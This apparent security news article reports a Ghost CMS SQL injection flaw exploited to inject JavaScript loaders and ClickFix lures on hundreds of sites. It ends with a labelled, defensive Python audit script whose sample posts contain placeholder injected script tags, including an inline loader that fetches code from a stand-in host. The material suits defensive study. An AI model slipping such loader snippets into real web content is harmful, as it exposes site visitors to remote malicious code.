Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign

Recorded: May 24, 2026, 2:57 p.m.

By Bill Toulas

May 24, 2026
10:12 AM

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.

Compromised sites (Source: XLab)
CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0, and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys.
This key gives management access to users, articles, and themes, and can be used to modify article pages.
Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.
On February 27, SentinelOne published details of CVE-2026-26980 being exploited in attacks, along with guidance on how such incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cluster removing the other's script to inject its own.

Timeline of the attacks (Source: XLab)
Attack chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles.
The JavaScript code is a lightweight loader that fetches second-stage code from the attacker’s infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure.

The ClickFix page (Source: XLab)
The page instructs victims to verify that they are human by pasting a provided command into their Windows command prompt, which drops a payload on their systems.
XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.

Attack phases (Source: XLab)
Mitigating the risk
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed.
XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove them.
The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation.
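As an added example (not code from the article, XLab, or the Ghost project): a small Python audit that walks post records of the shape a Ghost Admin API posts query returns and flags script and iframe references whose host is not on an owner-maintained allowlist, plus any inline script, which is the kind of review the published IoC list is meant to drive. The post records, hostnames and allowlist below are constructed; fetching the posts from the Admin API is assumed and left out.

```python
import re
from urllib.parse import urlparse

# Constructed sample of post records (fields trimmed to what the audit needs).
# Hostnames under .invalid are placeholders, not real indicators.
SAMPLE_POSTS = [
    {"id": "p1", "slug": "welcome",
     "html": '<p>Hello</p><script src="https://cdn.example.org/analytics.js"></script>'},
    {"id": "p2", "slug": "news",
     "html": '<p>Post</p><script src="https://loader.attacker-placeholder.invalid/l.js"></script>'},
    {"id": "p3", "slug": "about",
     "html": '<p>Text</p><iframe src="https://verify.attacker-placeholder.invalid/check"></iframe>'},
    {"id": "p4", "slug": "clean", "html": "<p>No scripts</p>"},
    {"id": "p5", "slug": "inline",
     "html": '<p>x</p><script>var s=document.createElement("script");'
             's.src="https://x.invalid/a.js";document.head.appendChild(s);</script>'},
]

# Assumption: hosts the site owner knowingly loads third-party code from.
ALLOWED_HOSTS = {"cdn.example.org"}

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)', re.I)
IFRAME_SRC = re.compile(r'<iframe[^>]*\ssrc=["\']([^"\']+)', re.I)
# Inline <script> blocks (no src attribute); injected loaders are often inline.
INLINE_SCRIPT = re.compile(r'<script(?![^>]*\ssrc=)[^>]*>(.*?)</script>', re.I | re.S)


def find_injected(post, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, evidence) tuples for every suspicious element in one post."""
    findings = []
    html = post.get("html") or ""
    for kind, pattern in (("script", SCRIPT_SRC), ("iframe", IFRAME_SRC)):
        for src in pattern.findall(html):
            host = urlparse(src).hostname or ""
            if host not in allowed_hosts:
                findings.append((kind, src))
    for body in INLINE_SCRIPT.findall(html):
        # Keep a short excerpt so an analyst can eyeball the loader.
        findings.append(("inline-script", body.strip()[:60]))
    return findings


def scan_posts(posts, allowed_hosts=ALLOWED_HOSTS):
    """Map slug -> findings for every post that has at least one finding."""
    return {p["slug"]: f for p in posts if (f := find_injected(p, allowed_hosts))}


if __name__ == "__main__":
    for slug, hits in scan_posts(SAMPLE_POSTS).items():
        print(slug, hits)
```

Run it against a fresh export after patching and again after cleanup; a post that reappears in the output is the re-infection pattern XLab describes.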


Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.
